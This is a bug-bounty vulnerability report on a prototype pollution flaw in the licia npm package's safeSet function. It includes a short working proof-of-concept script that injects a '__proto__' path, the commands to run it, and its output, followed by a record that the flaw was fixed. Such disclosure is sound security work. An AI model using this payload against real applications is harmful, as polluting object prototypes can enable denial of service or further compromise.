We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Prototype Pollution in liriliri/licia

Valid

Reported on

Sep 1st 2021

✍️ Description

licia package is vulnerable to Prototype Pollution. The safeSet function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var licia = require("licia")
let obj = {}
console.log("Before: " + {}.polluted)
licia.safeSet(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i licia # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

We have contacted a member of the liriliri/licia team and are waiting to hear back 2 years ago
ready-research submitted a
patch
2 years ago
RedHoodSu marked this as fixed with commit 10006a 2 years ago
RedHoodSu has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation